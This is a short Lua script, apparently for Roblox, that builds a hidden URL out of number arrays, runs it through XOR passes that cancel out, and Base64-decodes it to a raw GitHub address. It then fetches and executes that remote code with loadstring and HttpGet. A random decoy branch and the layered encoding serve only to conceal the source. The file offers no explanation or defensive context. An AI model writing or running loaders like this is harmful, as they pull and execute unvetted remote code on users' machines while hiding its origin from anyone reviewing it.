local H=game:GetService("HttpService")

local function a()
    local x=1
    for i=1,35 do
        x=(x*i)%101
    end
    return x
end

local function b(s,k)
    local t={}
    for i=1,#s do
        t[i]=string.char(bit32.bxor(s:byte(i),k))
    end
    return table.concat(t)
end

local c={
    [1]={97,72,82,48,99,72,77,54,76,121,57,121,89,88,99,117},
    [2]={90,50,108,48,97,72,86,105,100,88,78,108,99,109,78,118},
    [3]={98,110,82,108,98,110,81,117,89,50,57,116,76,50,74,115},
    [4]={98,50,57,107,97,72,86,105,76,87,86,116,99,72,108,48},
    [5]={97,83,57,117,89,87,104,112,100,50,108,117,76,51,74,108},
    [6]={90,110,77,118,97,71,86,104,90,72,77,118,98,87,70,112},
    [7]={89,103,61,61},
    [8]={98,105,57,110,98,50,53,116,97,87,53,112,76,87,104,49}
}

local function d()
    local o={1,2,3,4,5,6,8,7}
    local r={}
    for i=1,#o do
        for _,v in ipairs(c[o[i]]) do
            r[#r+1]=string.char(v)
        end
    end
    local s=table.concat(r)
    local k1=(#s%19)+13
    local k2=(#c*11)%29+9
    s=b(s,k1)
    s=b(s,k1)
    s=b(s,k2)
    s=b(s,k2)
    return H:Base64Decode(s)
end

if math.random(1,1200)==777 then
    a()
else
    loadstring(game:HttpGet(d()))()
end
